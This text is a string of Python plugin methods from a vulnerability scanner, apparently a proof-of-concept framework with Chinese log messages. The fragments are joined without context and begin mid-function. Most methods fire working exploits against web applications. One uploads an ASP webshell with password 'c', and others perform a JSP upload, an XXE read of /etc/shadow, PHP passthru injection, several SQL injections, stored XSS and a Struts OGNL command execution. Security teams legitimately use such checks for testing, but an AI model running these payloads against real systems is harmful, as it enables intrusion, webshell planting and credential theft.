'发现{target}存在{name}漏洞,漏洞地址为{url}'.format( target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def exploit(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) vun_url = arg + "/Comm/UploadFile/webUpload.aspx?AttId=9d37b73795649038.cer&FilePath=/../web/" data = ''' ------WebKitFormBoundarySi7aFG5fhvI14Vbv Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUJLTkxNTA4NDgxZGT4FQnTj63sW6bItFI88C2Fes3jcRPos/LRQn4yOHqiRw== ------WebKitFormBoundarySi7aFG5fhvI14Vbv Content-Disposition: form-data; name="fa"; filename="9d37b73795649038.cer" Content-Type: application/x-x509-ca-cert <%eval request("c")%> ------WebKitFormBoundarySi7aFG5fhvI14Vbv-- ''' r = requests.post(vun_url, data=data) res = r.text verify_url = arg + "9d37b73795649038.cer" if r.status_code == 200: self.output.report( self.vuln, '发现{target}存在{name}漏洞;\n已上传webshell地址:{url}密码为c,请及时删除。'. format(target=self.target, name=self.vuln.name, url=verify_url)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip( '/') + '/' + (self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = "/lwUpLoadTemp/null.jsp" verify_url = '{target}'.format(target=self.target)+payload target_url = '{target}'.format( target=self.target)+"/lwUpLoad_action.jsp" file_v_jsp = '''<%@ page import="java.util.*,java.io.*" %> <%@ page import="java.io.*"%> <% String path=application.getRealPath(request.getRequestURI()); File d=new File(path); out.println(path); %> <% out.println("payload=true");%> ''' files = {'theFile': ('v.jsp', file_v_jsp, 'text/plain')} response = requests.post(target_url, files=files) # 上传 response = requests.get(verify_url) # 验证 content = response.text if 'payload=true' in content: self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format( target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) filename = '/etc/shadow' payload = r'<?xml version="1.0" encoding="ISO-8859-1"?>'\ '<?xml version="1.0" encoding="ISO-8859-1"?>'\ '<!DOCTYPE foo ['\ '<!ELEMENT foo ANY >'\ '<!ENTITY xxe SYSTEM "file://{file}" >]>' \ '<Request>'\ '<Username>root</Username>'\ '<Password>root</Password>'\ '</Request>'.format(file=filename) expurl = arg + '/api/login' try: response = requests.post(expurl, data=payload, timeout=50) if re.match('root:.+?:0:0:.+?:.+?:.+?', response.text) and response.status_code == 200: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4" vul_url = self.target + payload vul_header = { "User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "115", "Cookie": self.get_option("cookies"), "Connection": "close", "Pragma": "no-cache", "Cache-Control": "no-cache" } data = '''_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1''' _response = requests.post(vul_url, data=data, header=vul_header) if '''{"response":"Success","details":"}''' in _response.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常:{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 首先注册用户。 # 获取cookies cookies = {} ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value ''' payload = "/my.php?item=buddylist[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,md5(c),0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1" data = "formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" url = self.target + payload r = requests.post(url, cookies=cookies, data=data) if '4a8a08f09d37b73795649038408b5f33' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 登录用户 self.output.info('开始对网站进行跨站脚本漏洞检查...') payload = '/guest/index.html' headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36', 'Cookie': '%s' % self.get_option('cookies') } data = "title=%3Csvg%2Fonload%3Dalert%28%27cscan%27%29%3E&name=test&email=test%40test.t&content=test" url = self.target + payload self.output.info('对网站/guest/index.html页面进行跨站请求验证...') r = requests.post(url, headers=headers, data=data) if "<script>alert('cscan')</script>" in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) arg = '{target}'.format(target=self.target) # 构造xss payload self.output.info('正在构造xss payload') payload1 = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent" data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc''' vul_url1 = arg + payload1 headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': self.get_option('cookie') } response1 = requests.post(vul_url1, headers=headers, data=data) # 验证xss是否成功触发 self.output.info('验证xss是否成功触发') payload2 = "/index.php?s=/admin/articlem/index.html&_=1532271572256" vul_url2 = arg + payload2 response2 = requests.get(vul_url2, headers=headers) if response2.status_code == 200 and '<td><img src=x onerror=alert(1)></td>' in response2.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: data = { 'username': '''cscan''', 'email': '''cscan''', 'age': """'+ (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo 92933839f1efb2da9a4799753ee8d79c').getInputStream())) + '""" } self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) request = requests.post( '{target}/user.action'.format(target=self.target), data=data) r = request.text if '92933839f1efb2da9a4799753ee8d79c' in r: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) # 登录用户 # 获取cookies cookies = {} ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value ''' # 根据安装目录不同payload可能不同,需根据实际情况判断 payload = '/upload/member.php?action=cz' data = "cckkey=aaaa0' or updatexml(1,concat(0x7e,(md5(c))),0) or '" url = self.target + payload r = requests.post(url, headers=cookies, data=data) if '4a8a08f09d37b73795649038408b5f33' in r.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))
def verify(self): self.target = self.target.rstrip('/') + '/' + ( self.get_option('base_path').lstrip('/')) try: self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format( target=self.target, vuln=self.vuln)) url = self.target req = requests.get(url) if req.status_code == 200: po_ids = re.findall(r'name="po_id" value="(\d+)"', req.text) for po_id in po_ids: verify_url = url + '/poll_update.php' post = ( "_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select" "count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by" "x)a)") % po_id reqp = requests.post(verify_url, data=post) if reqp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in reqp.text: self.output.report( self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name)) except Exception as e: self.output.info('执行异常{}'.format(e))